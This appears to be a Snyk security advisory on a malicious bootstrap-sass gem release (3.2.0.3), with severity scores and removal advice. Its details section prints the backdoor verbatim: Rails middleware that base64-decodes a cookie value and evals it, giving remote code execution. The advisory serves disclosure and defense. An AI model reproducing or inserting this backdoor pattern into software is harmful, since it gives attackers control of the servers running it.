Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Mature
    EPSS
    75.72% (99th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
  • published 3 Apr 2019
  • disclosed 26 Mar 2019
  • credit Derek Barnes

How to fix?

Avoid using the malicious versions of bootstrap-sass.

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass gets imported, it also imports the following malicious middleware code that resides on lib/active-controller/middleware.rb:

begin
 require 'rack/sendfile'
 if Rails.env.production?
   Rack::Sendfile.tap do |r|
     r.send :alias_method, :c, :call
     r.send(:define_method, :call) do |e|
       begin
         x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
         eval(x) if x
       rescue Exception
       end
       c(e)
     end
   end
 end
rescue Exception
 nil
end

CVSS Scores

version 3.1
Expand this section

Snyk

9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High